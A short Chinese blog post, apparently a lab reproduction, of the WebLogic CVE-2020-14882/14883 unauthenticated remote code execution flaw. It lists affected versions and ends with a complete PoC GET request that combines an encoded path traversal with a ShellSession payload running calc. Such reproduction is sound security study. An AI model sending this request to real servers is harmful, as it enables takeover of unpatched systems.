weblogic的CVE-2020-14882漏洞可以让未经身份验证的远程攻击者通过构造特殊的 HTTP GET请求,利用该漏洞在受影响的 WebLogic Server 上执行任意代码。将CVE-2020-14882和CVE-2020-14883进行组合利用后,远程且未经授权的攻击者可以直接在服务端执行任意代码,获取系统权限。于是在oracle官网上找来存在该漏洞的12.2.1.4.0版本,安装后进行复现。下面简单的用图文介绍一下我的复现过程。受影响的版本清单如下:
- Oracle Weblogic Server 10.3.6.0.0
- Oracle Weblogic Server 12.1.3.0.0
- Oracle Weblogic Server 12.2.1.3.0
- Oracle Weblogic Server 12.2.1.4.0
- Oracle Weblogic Server 14.1.1.0.0
一、安装、配置和启动
二、测试服务和漏洞渗透
1.靶机IP地址
2.构造HTTP Get请求并执行自定义命令
三、结束
贴上我用的POC脚本
GET
/console/images/%252E%252E%252Fconsole.portal?_nfpb=true&_pageLabel=HomePage1&handle=com.tangosol.coherence.mvel2.sh.ShellSession(%22java.lang.Runtime.getRuntime().exec(calc);%22); HTTP/1.1: Host: 192.168.167.153:7001 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101 Firefox/81.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Upgrade-Insecure-Requests: 1